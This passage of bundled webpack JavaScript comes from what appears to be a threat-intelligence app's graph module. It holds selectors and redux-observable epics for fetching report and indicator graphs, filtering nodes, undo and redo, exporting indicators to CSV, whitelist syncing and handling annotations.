/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types__ = __webpack_require__(301);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_reselect__);





var summary = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'current']);
var summaries = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'summaries']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'loading']);
var description = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'current', 'description']);
var attributes = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'current', 'attributes']);
var hasSummary = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'hasSummary']);
var summaryFullyExpanded = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'summaryFullyExpanded']);
var enclaveClosedSourceMapping = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['summaries', 'enclaveClosedSourceMapping']);

var closedSourceEnclaveMapSet = Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])([enclaveClosedSourceMapping], function (enclaveClosedSourceMapping) {
  return enclaveClosedSourceMapping.reduce(function () {
    var finalSet = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])();
    var currentSource = arguments[1];

    return currentSource.size > 0 ? finalSet.concat(currentSource) : finalSet;
  }, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])());
});

var getSummary = function getSummary(reportId) {
  return Object(__WEBPACK_IMPORTED_MODULE_3_reselect__["createSelector"])(summaries, function (summaries) {
    return summaries.get(reportId, __WEBPACK_IMPORTED_MODULE_2__types__["a" /* Summary */]());
  });
};

/***/ }),
/* 1385 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return recordFetchById; });
/* unused harmony export indicatorFetchById */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_moment__ = __webpack_require__(141);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_moment___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_moment__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_constellation_types_js__ = __webpack_require__(880);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_trustar_constellation_graph_utils_js__ = __webpack_require__(408);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_10_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_draft_js__ = __webpack_require__(879);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_draft_js___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_11_draft_js__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_analysis_action_types__ = __webpack_require__(372);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_reports_action_types__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist_action_types__ = __webpack_require__(281);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16__action_types_js__ = __webpack_require__(143);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17__constants__ = __webpack_require__(3191);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18__actions_js__ = __webpack_require__(576);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_19__getters__ = __webpack_require__(1350);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_20__action_types__ = __webpack_require__(143);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };


















var debug = __WEBPACK_IMPORTED_MODULE_10_debug___default()('app:modules:constellation:epics'); // eslint-disable-line no-unused-vars







// TODO: Ugly without being properly composed (repeated id). refactor later
var url = function url(params) {
  if (params.type === 'INDICATOR') {
    return Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["compose"])(Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])(_extends({}, __WEBPACK_IMPORTED_MODULE_17__constants__["b" /* queryIndicatorParams */], params)), __WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])(params.value);
  } else {
    return Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["compose"])(Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])(_extends({}, __WEBPACK_IMPORTED_MODULE_17__constants__["c" /* queryRecordParams */], params)), __WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])(params.id);
  }
};

/* Log possible errors and keep Rx stream alive */
var handleError = function handleError(error, stream) {
  var message = 'Error in Constellation Epics:';
  console.warn(message);
  console.error(error);
  // TODO_LOG
  // Raven.captureException(new Error(message), { extra: { error }});
  return stream;
};

// We want to be sure that the "index" key is not present because it will be
// overwritten by the utterly silly d3-force. ʕつಠᴥಠʔつ ︵ ┻━┻
// Wrapped in IO just to guard against this loci producing any unforseen errors
// and breaking the epic.
var normalizeOsintNodes = function normalizeOsintNodes(graph) {
  return __WEBPACK_IMPORTED_MODULE_7_trustar_fp__["IO"].of(graph).map(function (graph) {
    var nodes = graph.nodes.map(function (x) {
      if (x.index) {
        x.esIndex = x.index;
        delete x.index;
      }
      return x;
    });

    return _extends({}, graph, { nodes: nodes });
  }).foldOr(function () {
    return graph;
  });
};

/**
 * NOTE: If x.payload is meant to fetch an indicator based graph then we need to
 * re-construct its id after the fetch.
 *
 * If the underlying report is not fully processed by the server Station will return a 404.
 */
var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["m" /* FETCH */]).switchMap(function (x) {
    var id = x.payload.id || x.payload.indicatorType + '|' + x.payload.value;

    return ajax.get(url(x.payload)).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(normalizeOsintNodes).mergeMap(function (response) {

      var action = [{
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["r" /* FETCH_SUCCESS */],
        payload: {
          id: id, // See NOTE
          data: response,
          type: x.payload.type,
          indicatorType: x.payload.indicatorType,
          value: x.payload.value
        }
      }];

      var _response$nodes$reduc = response.nodes.reduce(function (counts, _ref2) {
        var nodeType = _ref2.nodeType;

        if (nodeType === 'RECORD') counts.reports++;
        if (nodeType === 'INDICATOR') counts.iocs++;
        return counts;
      }, { reports: 0, iocs: 0 }),
          reports = _response$nodes$reduc.reports,
          iocs = _response$nodes$reduc.iocs;

      if (reports <= 1 && x.payload.id) {
        if (iocs === 0) {
          action.push(Object(__WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions__["warn"])('\n                NOTE: This report has no correlations or extracted indicators.\n              '));
        } else {
          action.push(Object(__WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions__["warn"])('\n                NOTE: This report has no correlations to other reports.\n              '));
        }
      }

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(action);
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["q" /* FETCH_FAILURE */],
        error: true,
        payload: { id: id, err: err },
        meta: {
          alert: {
            type: Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('status', err) === 404 ? 'info' : 'error', // see NOTE
            text: Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["parseServerErrorMessage"])(err)
          }
        }
      });
    });
  });
};

var recordFetchById = function recordFetchById(id, ajax, originId) {
  var url = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])(_extends({}, __WEBPACK_IMPORTED_MODULE_17__constants__["c" /* queryRecordParams */], { id: id, originId: originId }), Object(__WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])());
  return ajax.get(url);
};

var indicatorFetchById = function indicatorFetchById(id, value, indicatorType, ajax, originId) {
  var url = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])(_extends({}, __WEBPACK_IMPORTED_MODULE_17__constants__["b" /* queryIndicatorParams */], { id: id, value: value, indicatorType: indicatorType, originId: originId }), Object(__WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])());
  return ajax.get(url);
};

var fetchExplosionEpic = function fetchExplosionEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["n" /* FETCH_EXPLOSION */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (node) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      var id = node.id,
          initialId = node.initialId,
          type = node.type,
          value = node.value,
          nodeType = node.nodeType,
          indicatorType = node.indicatorType;

      if (!id) {
        throw new Error('No nodeId provided');
      }

      if (type !== __WEBPACK_IMPORTED_MODULE_8_trustar_constellation_types_js__["a" /* INCIDENT_REPORT_TYPE */] && nodeType !== __WEBPACK_IMPORTED_MODULE_8_trustar_constellation_types_js__["c" /* INDICATOR_TYPE */]) {
        throw new Error('You are trying to fetch constellation for unsupported type "' + node.type + '"');
      }

      if (!initialId) {
        throw new Error('You are trying to fetch constellation without a report ID');
      }

      var graphId = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](store.getState());

      var ajaxByType = nodeType === __WEBPACK_IMPORTED_MODULE_8_trustar_constellation_types_js__["c" /* INDICATOR_TYPE */] ? indicatorFetchById(initialId, value, indicatorType, ajax, graphId) : recordFetchById(initialId, ajax, graphId);

      return ajaxByType.map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(normalizeOsintNodes).map(function (response) {
        return {
          type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["p" /* FETCH_EXPLOSION_SUCCESS */],
          payload: {
            id: graphId,
            data: response
          }
        };
      }).catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ // Catch fetch errors
          type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["o" /* FETCH_EXPLOSION_FAILURE */],
          error: true,
          payload: err,
          meta: {
            alert: {
              type: 'error',
              text: 'There was an error fetching additional relations for report with id "' + initialId + '"'
            }
          }
        });
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ // Catch validation errors thrown above
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["o" /* FETCH_EXPLOSION_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/**
 * Given a Set of nodeIds return all the nodes and edges in the current
 * graph that are either not in the Set or not connected to any id in the
 * set (in the case of edges).
 *
 * Update 2016-10-13: Deletion now also removes orphaned nodes. Meaning any
 * node which no longer has any edges connected to it.
 *
 * NOTE: This sort of logic is normally reserved for stores. However, since we
 * want to verify the new state and dispatch other side effects if it's invalid
 * it made more sense to do it here. This issue could likely be elegantly
 * resolved with something like redux-observable. Something to think about in
 * the future if we implement our own.
 */
var deleteCurrentSelectionEpic = function deleteCurrentSelectionEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["g" /* DELETE_NODES */]).mergeMap(function () {
    var state = store.getState();
    var nodeIds = __WEBPACK_IMPORTED_MODULE_19__getters__["currentNodeIds"](state);
    var graph = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphWithEnclaves"](state);

    var filtered = Object(__WEBPACK_IMPORTED_MODULE_9_trustar_constellation_graph_utils_js__["calculateFiltered"])(graph, graph.getIn(['filters', 'inactiveFilters']));
    var newGraph = Object(__WEBPACK_IMPORTED_MODULE_9_trustar_constellation_graph_utils_js__["removeNodes"])(graph, filtered.merge(nodeIds));

    if (!newGraph.getIn(['data', 'nodes']).size) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions__["error"])('Cannot delete selection because no nodes would remain in this graph.'));
    }

    var id = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](state);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["h" /* DELETE_NODES_SUCCESS */], payload: { id: id, data: nodeIds } });
  }).catch(handleError);
};

var toggleActiveFilterEpic = function toggleActiveFilterEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["J" /* SET_FILTERS */]).mergeMap(function (_ref6) {
    var _ref6$payload = _ref6.payload,
        filterPayload = _ref6$payload.filters,
        type = _ref6$payload.type,
        system = _ref6$payload.system,
        enclaveId = _ref6$payload.enclaveId,
        tag = _ref6$payload.tag;

    var filterText = filterPayload ? filterPayload.filterText : null;
    var state = store.getState();
    var graph = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphWithEnclaves"](state);
    var filters = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphFilters"](state).set('filterText', filterText ? filterText : '');

    var newFilters = filters;
    if (enclaveId) {
      newFilters = filters.updateIn(['inactiveFilters'], function (v) {
        return v.has(enclaveId) ? v.delete(enclaveId) : v.set(enclaveId, { type: type, enclaveId: enclaveId });
      });
    } else if (system) {
      newFilters = filters.updateIn(['inactiveFilters'], function (v) {
        return v.has(system) ? v.delete(system) : v.set(system, { type: type, system: system });
      });
    } else if (type) {
      newFilters = filters.updateIn(['inactiveFilters'], function (v) {
        return v.has(type) ? v.delete(type) : v.set(type, { type: type });
      });
    } else if (tag) {
      newFilters = filters.updateIn(['inactiveFilters'], function (v) {
        return v.has(tag) ? v.delete(tag) : v.set(tag, { tag: tag });
      });
    }

    var filtered = Object(__WEBPACK_IMPORTED_MODULE_9_trustar_constellation_graph_utils_js__["calculateFiltered"])(graph, newFilters.get('inactiveFilters'));
    var newGraph = Object(__WEBPACK_IMPORTED_MODULE_9_trustar_constellation_graph_utils_js__["removeNodes"])(graph, filtered.merge(graph.get('deletedNodes')));

    if (!newGraph.getIn(['data', 'nodes']).size) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions__["error"])('Cannot delete selection because no nodes would remain in this graph.'));
    } else {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["K" /* SET_FILTERS_SUCCESS */],
        payload: {
          id: __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](state),
          filters: newFilters
        }
      });
    }
  }).catch(handleError);
};

/**
 * Store the coordinates of all the nodes in the graph cache so that we do not
 * need to resimulate if the user comes back to this report.
 *
 * NOTE: I'm not sure checking the simulation is necessary, but it was left over
 * here so for now i've kept it
 *
 * NOTE: If the graph has not yet settled the the nodes won't have an fx, or fy.
 * In this case default to the current x,y.
 */
var cacheGraphSimulationEpic = function cacheGraphSimulationEpic(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["b" /* CACHE_GRAPH_SIMULATION */]).filter(function (_ref8) {
    var simulation = _ref8.payload;
    return simulation && typeof simulation.nodes === 'function';
  }) // See NOTE
  .mergeMap(function (_ref9) {
    var simulation = _ref9.payload;

    var id = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](store.getState());

    // NOTE: vx,vy are also present, but are they relevant for our purposes?
    // So far it seems not.
    var data = {
      nodes: simulation.nodes().map(function (_ref10) {
        var id = _ref10.id,
            x = _ref10.x,
            y = _ref10.y,
            fx = _ref10.fx,
            fy = _ref10.fy,
            index = _ref10.index;
        return {
          id: id,
          x: x,
          y: y,
          fx: fx || x,
          fy: fy || y,
          index: index
        };
      })
    };

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["c" /* CACHE_GRAPH_SIMULATION_SUCCESS */], payload: { id: id, data: data } });
  }).catch(handleError);
};

/**
 * Redirect back to browse after report has been removed
 */
var redirectOnRemoveEpic = function redirectOnRemoveEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_14_modules_reports_action_types__["D" /* REMOVE_SUCCESS */]).filter(function () {
    var routerState = store.getState().get('router');
    var pathname = routerState.locationBeforeTransitions.pathname;


    var pathHasReportId = pathname.replace('constellation/reports', '').replace(/\//g, '');

    return pathname.includes('constellation/reports') && !pathHasReportId;
  }).map(function () {
    return Object(__WEBPACK_IMPORTED_MODULE_1_react_router_redux__["replace"])('/browse');
  });
};

var undoEpic = function undoEpic(action$, store, _ref11) {
  var ajax = _ref11.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["P" /* UNDO */]).mergeMap(function () {
    var id = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](store.getState());
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["Q" /* UNDO_SUCCESS */], payload: { id: id } });
  }).catch(handleError);
};

var redoEpic = function redoEpic(action$, store, _ref12) {
  var ajax = _ref12.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["y" /* REDO */]).mergeMap(function () {
    var id = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](store.getState());
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["z" /* REDO_SUCCESS */], payload: { id: id } });
  }).catch(handleError);
};

var resetEpic = function resetEpic(action$, store, _ref13) {
  var ajax = _ref13.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["B" /* RESET */]).mergeMap(function () {
    var id = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraphId"](store.getState());
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["E" /* RESET_SUCCESS */], payload: { id: id } });
  }).catch(handleError);
};

var exportIndicatorsEpic = function exportIndicatorsEpic(action$, store, _ref14) {
  var ajax = _ref14.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["l" /* EXPORT_INDICATORS */]).mergeMap(function () {
    var indicators = __WEBPACK_IMPORTED_MODULE_19__getters__["indicatorsInCurrentGraph"](store.getState());
    var csv = 'IOC Type,Value\n' + indicators.map(function (x) {
      return x.get('type') + ',' + x.get('value');
    }).join('\n');
    var filename = 'GraphIOCs-' + __WEBPACK_IMPORTED_MODULE_5_moment___default()().format('YYYYMMDDHHmmss') + '.csv';
    Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["saveTextToFile"])(filename, csv);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
  }).catch(handleError);
};

/**
 * This epic is responsible for maintaining a valid state in constellation when
 * the user updates their whitelist. In practice this means that when the
 * whitelist changes:
 *
 * - Completely invalidate the graph cache
 * - Refetch the current graph, if any
 *
 * Invalidating the entire cache may seem like overkill, but it's a simple
 * solution to the issue. If the whitelist changes then it's possible every
 * graph in memory is stale. When the user whitelists a new ioc we could
 * identify any graphs within cache that contain that ioc and only operate on
 * them. However, in the case of the user removing a term from the whitelist
 * then by definition none of the graphs in memory will contain that ioc, so we
 * have no way of knowing which (if any) are stale.
 *
 * Currently, the downside of our approach is that node positioning and
 * undo/redo history are blown away since they are also part of the "cache". A
 * better approach would be to rearchitect this module and separate out
 * various parts of state. First and foremost would be node positioning, which
 * could live in it's own slice of state and be merged with nodes before getting
 * to the component layer.
 */
var whitelistSyncEpic = function whitelistSyncEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist_action_types__["SAVE_WHITELIST_ENTRY_SUCCESS"], __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist_action_types__["DELETE_WHITELIST_ENTRY_SUCCESS"], __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist_action_types__["SAVE_WHITELIST_ENTRIES_SUCCESS"]) // TODO: Delete Whitelisted IOC
  .filter(function (action) {
    // filter by special meta type that indicates whitelisting occured in graph view
    return action.meta && action.meta.invalidate_cache;
  }).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('type')).mergeMap(function (type) {
    var actions = [{ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["u" /* INVALIDATE_GRAPH_CACHE */] }];

    // When whitelisting something it is done from the graph UI, so we want to
    // trigger an immediate refresh and re-fetch the graph. However, when
    // removing a term from the whitelist it is done from the settings UI.
    // This means we don't need to do a fetch as it will be done by the Graph
    // UI when the user returns to it (if they even do)
    //
    // NOTE: I'm unshifting to get the fetch in there before the invalidation.
    // Fetch triggers the loading state so the user won't get any interim
    // state while the cache has been wiped and the new graph not yet fetched
    if (type === __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist_action_types__["SAVE_WHITELIST_ENTRIES_SUCCESS"] || type === __WEBPACK_IMPORTED_MODULE_15_modules_company_whitelist_action_types__["SAVE_WHITELIST_ENTRY_SUCCESS"]) {
      var currentGraph = __WEBPACK_IMPORTED_MODULE_19__getters__["currentGraph"](store.getState());
      if (currentGraph.type === 'INDICATOR') {
        actions.unshift(Object(__WEBPACK_IMPORTED_MODULE_18__actions_js__["fetch"])({
          id: currentGraph.id,
          type: 'INDICATOR',
          indicatorType: currentGraph.indicatorType,
          value: currentGraph.value
        }));
      } else {
        actions.unshift(Object(__WEBPACK_IMPORTED_MODULE_18__actions_js__["fetch"])({
          id: currentGraph.id,
          type: 'RECORD'
        }));
      }
    }

    return actions;
  });
};

/**
 * Given an EditorState return the current ContentState. Very simple, but we end
 * up doing this quite a bit so I moved it into its own function.
 */
var getCurrentContent = function getCurrentContent(editorState) {
  return editorState.getCurrentContent();
};

/**
 * NOTE: This isomorphism converts between a full draft-js editor state and
 * plain text stringified JSON to be stored server side. As you will see, the
 * from and to methods simply reverse eachother.
 */
var NoteIso = {
  to: Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(getCurrentContent, __WEBPACK_IMPORTED_MODULE_11_draft_js__["convertToRaw"], JSON.stringify),
  from: Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(JSON.parse, __WEBPACK_IMPORTED_MODULE_11_draft_js__["convertFromRaw"], __WEBPACK_IMPORTED_MODULE_11_draft_js__["EditorState"].createWithContent)
};

var fromNoteResponse = function fromNoteResponse(data) {
  var result = Object(__WEBPACK_IMPORTED_MODULE_8_trustar_constellation_types_js__["e" /* Note */])(data).set('editorState', NoteIso.from(data.note));
  return result;
};

var annotationsFromGraphFetch = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['payload', 'data', 'nodes']), Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["filter"])(function (x) {
  return Array.isArray(x.annotations);
}), Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["map"])(function (x) {
  return [x.id, x.annotations];
}) // Create pairs mapping IDs to annotations array
);

var processAnnotations = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_4_ramda__["fromPairs"], Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["map"])(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])( // Turn each array of annotations into an array of OrderedMaps
Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["map"])(fromNoteResponse), Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["listToOrderedMap"])('guid'))), __WEBPACK_IMPORTED_MODULE_2_immutable__["Map"] // Convert to map
);

/**
 * NOTE: Unfortunately we are currently doing some immutable data conversion in
 * the analysis epics before dispatching. In order to interop smoothly with our
 * existing data parsing logic here in constellation we need plain JS objects
 * and arrays to pass in for processing. This epic just converts the data
 * payload back into plain JS before sending it through to the processNotesEpic
 *
 * Also note that the mapped data is not an actual action. It lacks a type. It
 * just formats the data to be JS and puts it at the path payload.data which
 * annotationsFromGraphFetch can pick up and handle.
 */
var getFetchedCasesStream = function getFetchedCasesStream(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_13_modules_analysis_action_types__["i" /* FETCH_ANALYSIS_SUCCESS */]).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(action).map(function (x) {
      return {
        payload: {
          data: x.payload.data.toJS() // See NOTE
        }
      };
    }).catch(function (err) {
      console.warn('Could not process annotations for analysis', err);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
    });
  });
};

/**
 * Whenever the graph is fetched grab all the annotations from all nodes and
 * prepare them to be stored in the notes store, with a mapping of nodeId ->
 * OrderedMap of note items
 *
 * NOTE: This is how notes are "fetched". There is no explicit fetching.
 */
var processNotesEpic = function processNotesEpic(action$) {
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["r" /* FETCH_SUCCESS */], __WEBPACK_IMPORTED_MODULE_16__action_types_js__["p" /* FETCH_EXPLOSION_SUCCESS */]), getFetchedCasesStream(action$) // See NOTE above getFetchedCasesStream
  ).mergeMap(function (x) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(x) // Wrap to facilitate error catching
    .map(annotationsFromGraphFetch).filter(function (x) {
      return x.length;
    }) // No further processing unless we have annotations
    .map(processAnnotations).map(function (payload) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["x" /* PROCESS_ANNOTATIONS_SUCCESS */],
        payload: payload
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["w" /* PROCESS_ANNOTATIONS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/**
 * Fetch annotations for a single report when the report is fetched
 *
 * NOTE: We could probably do this with the store_report action rather than the
 * success action, assuming that it would be successful.
 */
var fetchAnnotationsEpic = function fetchAnnotationsEpic(action$, store, _ref15) {
  var ajax = _ref15.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_14_modules_reports_action_types__["Q" /* STORE_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (x) {
    var initialId = x.get('id');
    var url = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])({ initialId: initialId }, Object(__WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])() + '/annotations');
    return ajax.get(url).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(function (res) {
      return [[initialId, res]];
    }) // Format data for processAnnotations
    .map(processAnnotations).filter(function (x) {
      // NOTE: If there were no annotations don't dispatch anything. This
      // makes sure a node doesn't accidentally display a "has notes" icon
      // on the graph simply because its id was put into the store
      return x.first().size > 0;
    }).map(function (payload) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["x" /* PROCESS_ANNOTATIONS_SUCCESS */],
        payload: payload
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["w" /* PROCESS_ANNOTATIONS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/**
